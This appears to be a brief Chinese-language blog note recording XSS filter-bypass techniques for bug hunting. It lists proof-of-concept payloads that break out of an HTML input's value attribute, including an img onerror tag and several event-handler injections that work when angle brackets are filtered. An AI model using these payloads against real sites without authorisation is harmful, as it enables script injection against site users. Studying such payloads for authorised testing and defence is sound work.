xss bypass 學習記錄

0x01雜言

晚上看了一下bypass 的一些套路，羅列了一下各類狀況的payload好讓挖洞能夠直接用，看着看着就被朋友拉去挖洞了。。。固然也是針對xss
這裏先總結下幾種測試狀況，以及挖洞過程測試xss的步驟方法。。。固然我以前挖到的xss都是沒有waf的狀況屬於隨緣挖洞，一些高級的bypass技巧在挖洞過程當中的應用仍是但願和你們探討

0x02 個人xss測試步驟

首先輸入常規的標籤 看看輸出位置 ，看看對常規的標籤的過濾，再試試<a這種是否過濾尖括號
再看看其餘的。。。

0x03結合具體輸出場景

<input value="" type=text>

好比這種在value中的輸出

<input value="XSStest" type=text>
"><img src=x onerror=prompt(0);>

過濾尖括號

" autofocus onfocus=alert(1)//   
"onmouseover=" prompt(0)x="
"onfocusin=alert(1) autofocusx="
" onfocusout=alert(1) autofocus x="
"onblur=alert(1) autofocusa="

睡覺睡覺